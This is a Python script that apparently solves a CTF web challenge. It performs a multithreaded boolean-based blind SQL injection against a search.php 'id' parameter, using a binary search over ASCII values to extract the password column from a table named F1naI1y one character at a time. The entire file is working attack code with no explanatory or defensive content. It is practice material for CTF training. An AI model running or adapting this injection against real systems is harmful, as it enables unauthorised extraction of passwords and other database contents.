#!/usr/bin python3
# coding: utf-8
import requests, threading

url = "http://3f94eb72-b5ea-4661-8818-6a3f666feef0.node3.buuoj.cn/search.php?id="
res = {}


def exploit_flag():
    """爆破flag值"""
    flag = []
    for i in range(1, 50, 5):
        t1 = threading.Thread(target=exploit_one_letter, args=(i,))
        t2 = threading.Thread(target=exploit_one_letter, args=(i + 1,))
        t3 = threading.Thread(target=exploit_one_letter, args=(i + 2,))
        t4 = threading.Thread(target=exploit_one_letter, args=(i + 3,))
        t5 = threading.Thread(target=exploit_one_letter, args=(i + 4,))
        t1.start()
        t2.start()
        t3.start()
        t4.start()
        t5.start()
        t1.join()
        t2.join()
        t3.join()
        t4.join()
        t5.join()
        print(res)
    for i in range(1, 50):
        flag.append(str(res.get(i)))
    print("".join(flag))


def exploit_one_letter(i: int) -> str:
    l, r, mid = 32, 127, (32 + 127) // 2
    while l < r:
        payload = f"1^((ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1)))>({mid}))--%20"
        tmp_url = url + payload
        resp = requests.get(tmp_url)
        if "ERROR" in resp.text:
            # 这种情况为不正常回显 ascii-val > mid
            l = mid + 1
        else:
            # 这种情况为正常回显 ascii-val <= mid
            r = mid
        mid = (l + r) // 2
    res[int(i)] = chr(int(mid))


if __name__ == "__main__":
    exploit_flag()
